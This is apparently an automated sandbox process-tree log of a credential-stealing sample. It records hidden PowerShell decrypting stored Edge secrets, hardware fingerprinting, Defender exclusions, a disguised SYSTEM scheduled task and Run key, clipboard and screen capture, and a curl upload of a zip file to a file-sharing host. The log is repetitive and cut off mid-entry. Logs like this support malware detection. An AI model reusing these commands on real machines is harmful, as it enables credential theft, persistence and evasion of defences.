C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵PID:1724
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵PID:396
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:4052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵PID:4668
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Scheduled Task/Job: Scheduled Task
PID:5292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Clipboard Data
- Hide Artifacts: Hidden Window
PID:792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:676 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.cmdline"4⤵PID:1016
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EE4.tmp" "c:\Users\Admin\AppData\Local\Temp\alkib1u5\CSC7E947611C34014BACF222DB2E44B9.TMP"5⤵PID:3516
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:5672
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""2⤵PID:5684
-
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"3⤵PID:1696
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "4⤵PID:3880
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5692
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\Downloads\Discord Hack Tool.exe" /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:5652
-
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"5⤵
- Modifies registry key
PID:5276
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE5⤵PID:2572
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵PID:1172
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵PID:1540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4828
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1504
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:6000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵PID:876
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:5336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2240
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"2⤵PID:5112
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID3⤵PID:4128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"2⤵PID:3688
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber3⤵PID:4044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:1668
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:1740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:6104
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"2⤵PID:2964
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid3⤵PID:5644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:5248
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"2⤵PID:2124
-
C:\Windows\system32\getmac.exegetmac /NH3⤵PID:6056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3448
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2776
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:2612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3544
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2080
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4192
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4540
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5780
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:5256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3100
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5616
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵
- Blocklisted process makes network request
PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1496
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1728
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1364
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1016
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""2⤵PID:5452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";"2⤵PID:4632
-
C:\Windows\system32\curl.execurl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";3⤵PID:2928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2884
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3920
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:6012
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4544
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:5600
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2760
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3448
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1828
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3496
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3564
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5472
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1796
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5408
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5608
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1332
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1276
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:5140
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5752
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2948
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3752
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2340
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1420
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4300
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1984
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3960
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:888
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2592
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1408
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2536
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2276
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2144
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2200
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:5708
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5600
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5004
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:5564
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:2404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5328
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2124
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:756
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4848
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:364
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:5540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:4268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4316
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1476
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5428
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4228
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:5684
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:6128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:1064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5140
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2068
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:2072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:5352
-
